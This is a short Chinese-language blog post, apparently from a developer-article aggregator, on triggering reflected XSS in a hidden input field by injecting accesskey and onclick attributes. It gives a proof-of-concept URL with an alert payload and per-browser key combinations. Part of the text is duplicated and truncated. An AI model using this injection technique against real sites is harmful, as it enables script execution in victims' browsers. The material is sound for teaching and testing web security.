Hidden属性的input标签中XSS的触发方法
2016-03-31 11:24
459 查看
今天看到一个XSS漏洞,插入点在一个有
正常情况下的XSS应当是:
http://victim/?value=” onclick=”alert(document.domain)
但是这里由于该
PoC为:
http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)
触发方法不同的浏览器不同,下面是w3school的总结:
所以上面的XSS触发方法为:
FF下:shift+alt+X (测试成功)
Chrome:alt+X (最新版Chrome未测试成功)
IE下:alt+X (未测试成功)
hidden属性的
input标签,大致情况如下:
<input type="hidden" name="returnurl" value="[USER INJECT]" />
正常情况下的XSS应当是:
http://victim/?value=” onclick=”alert(document.domain)
但是这里由于该
input未在页面中显示,常用的
onclick方法无法使用(点不到这个标签怎么触发onclick…),不过在浏览器中还有一个好玩的属性叫
accesskey于是乎构造:
<input type="hidden" name="returnurl" value="" accesskey="X" onclick="alert(document.domain)" />
PoC为:
http://victim/?returnurl=” accesskey=”X” onclick=”alert(document.domain)
触发方法不同的浏览器不同,下面是w3school的总结:
所以上面的XSS触发方法为:
FF下:shift+alt+X (测试成功)
Chrome:alt+X (最新版Chrome未测试成功)
IE下:alt+X (未测试成功)
相关文章推荐
- 简单的等式
- Odoo8.0的弹窗通过标题栏进行移动
- 测试下代码格式
- 常用的三方工具汇总
- linux 安装库 编译提示-lcrypto 无法链接,缺少 crypto 库
- 手机安装apk出现INSTALL_FAILED_INSUFFICIENT_STORAGE
- STM32F030 IO口外部中断应用
- zTree学习文档和DEOM
- POJ 3281 网络流dinic算法
- 顺序表和链表的模板
- 笔记 - 10.2、HTML - CSS选择器笔记
- android 根据生日生成星座
- JQUERY实现局部刷新
- 笔记 - 10.1、HTML - CSS概念笔记
- JMS入门:一、基本构件
- 全面解析Linux 内核 3.10.x - initramfs 启动流程
- js实现跨域的几种方法的原理详解
- 【多线程开发】临界区死锁问题
- Codeforces 659A Round House (模拟)
- ios线程的五种使用方式